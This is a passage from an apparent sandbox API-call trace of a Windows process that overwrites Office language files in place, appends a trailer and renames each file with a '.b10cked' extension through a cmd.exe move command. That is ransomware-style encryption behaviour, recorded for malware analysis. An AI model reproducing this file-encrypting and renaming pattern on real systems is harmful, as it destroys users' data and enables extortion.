lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.853] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.853] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.853] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x23478 [0174.853] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x23960 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x23960 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.874] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.881] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2caf, lpOverlapped=0x0) returned 1 [0174.883] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.883] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.883] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2caf, lpOverlapped=0x0) returned 1 [0174.883] SetFilePointer (in: hFile=0x120, lDistanceToMove=-72879, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x11cb1 [0174.884] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.884] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2caf, lpOverlapped=0x0) returned 1 [0174.885] SetFilePointer (in: hFile=0x120, lDistanceToMove=-72879, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x11cb1 [0174.885] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.885] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2caf, lpOverlapped=0x0) returned 1 [0174.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0174.890] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x23960 [0174.890] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0174.890] CloseHandle (hObject=0x120) returned 1 [0174.893] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX") returned 0x3c [0174.894] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0174.895] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe38, dwThreadId=0x638)) returned 1 [0174.918] CloseHandle (hObject=0x1b4) returned 1 [0174.918] CloseHandle (hObject=0x120) returned 1 [0174.918] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.918] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.918] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23170798465) returned 1 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x126278 [0174.920] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x126760 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x126760 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0175.236] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.061] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.062] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.064] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.064] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.064] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.065] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.065] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0176.065] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.067] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.119] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.122] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.123] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0176.123] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.403] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.448] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0176.450] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.450] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.451] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.451] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x106760 [0176.451] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.452] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.453] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x106760 [0176.454] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.455] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.455] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, 